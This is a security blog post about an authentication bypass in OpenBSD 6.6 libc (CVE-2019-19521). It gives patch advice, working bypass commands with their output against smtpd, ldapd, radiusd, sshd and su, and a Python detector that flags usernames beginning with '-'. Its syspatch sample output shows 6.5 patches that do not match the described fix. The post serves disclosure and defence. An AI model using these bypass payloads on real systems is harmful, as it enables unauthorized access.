New authentication bypass vulnerability found in OpenBSD

Affecting:

opensmtpd
ldapd
radiusd
sshd
su

on OpenBSD.



Sometimes a zero-day in widely used software is the simplest thing.

Summary:

A remote authentication bypass vulnerability has been found in the latest version of OpenBSD, 6.6. Due to insufficient username validation in libc, a remote third party can exploit the login functions of libc.

Patch it

The OpenBSD developer Reyk Flöter was quick to tweet about this vulnerability.



If you are running OpenBSD, it is time to run syspatch:

# syspatch
Get/Verify syspatch65-011_expat.tgz 100% |*********| 588 KB 00:02
Installing patch 011_expat
Get/Verify syspatch65-012_sysupgr... 100% |********| 11482 00:00
Installing patch 012_sysupgrade
Relinking to create unique kernel... done; reboot to load the new kernel
Errata can be reviewed under /var/syspatch

A fix has been written and published as the latest patch, 010_libcauth.patch.

Exploiting the authentication bypass

A report of the vulnerability has been published on the Bugtraq mailing list.

The vulnerability can easily be exploited by supplying a username consisting of the flag “-schallenge” (or “-schallenge:passwd” to force passwd-style authentication).

The report describes the vulnerability and the affected components:

smtpd

If authentication in /etc/mail/smtpd.conf is enabled by simply appending “auth” to a rule, then your system is vulnerable.

The authentication can be bypassed:

$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy
$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded

ldapd

$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whatever
SASL/PLAIN authentication started
ldap_sasl_interactive_bind_s: Invalid credentials (49)
$ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whatever
SASL/PLAIN authentication started
SASL username: -schallenge
...
# numResponses: 1

radiusd

If bsdauth is enabled in /etc/radiusd.conf:

$ radiusctl test 192.168.56.121 secret -schallenge password whatever
...
Reply-Message = "Authentication succeeded"

sshd

$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \
    -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121
...
debug1: Next authentication method: keyboard-interactive

su

$ su -L -- -schallenge
Segmentation fault
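As an added, defender-side example (not code from the original post or from OpenBSD), the following Python decodes a SASL PLAIN blob like the one shown in the smtpd section and applies the validation rule that all of the payloads above rely on being absent: a login name that begins with "-" must be rejected or alerted on before it reaches the BSD auth layer. The sample usernames and the helper names are constructed for this example.

```python
import base64

# Constructed sample: the AUTH PLAIN blob from the smtpd session above, which is
# base64("\0-schallenge\0whatever") in RFC 4616 layout: [authzid] NUL authcid NUL passwd.
SAMPLE_AUTH_PLAIN = "AC1zY2hhbGxlbmdlAHdoYXRldmVy"

# Constructed usernames as they might be pulled from smtpd/ldapd/radiusd/sshd auth logs.
SAMPLE_USERNAMES = [
    "alice",
    "invaliduser",
    "-schallenge",
    "-schallenge:passwd",
    "-sresponse:passwd",
]


def decode_sasl_plain(blob):
    """Split a base64 SASL PLAIN message into (authzid, authcid, password).

    Raises ValueError on bad base64 or on a message without exactly two NULs.
    """
    raw = base64.b64decode(blob, validate=True)
    parts = raw.split(b"\0")
    if len(parts) != 3:
        raise ValueError("malformed SASL PLAIN message")
    return tuple(p.decode("utf-8", "replace") for p in parts)


def username_is_suspicious(user):
    """A login name starting with '-' would be parsed as an option (e.g. -s <style>)
    by the login_* program the BSD auth framework hands it to; never let it through."""
    return user.startswith("-")


def find_bypass_attempts(usernames):
    """Return every username in a batch that should be rejected and alerted on."""
    return [u for u in usernames if username_is_suspicious(u)]


def check_auth_plain(blob):
    """Decode an AUTH PLAIN blob and report whether its authcid looks like a bypass."""
    _authzid, authcid, _password = decode_sasl_plain(blob)
    return authcid, username_is_suspicious(authcid)


if __name__ == "__main__":
    print(check_auth_plain(SAMPLE_AUTH_PLAIN))
    print(find_bypass_attempts(SAMPLE_USERNAMES))
```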

External links:

OpenBSD 6.6 errata

CVE-2019-19521

Bugtraq announcement

libc wikipedia

OpenBSD libc patch


This blog post is part of the Exploit of the Day series, where we write a short description of interesting exploits that we index.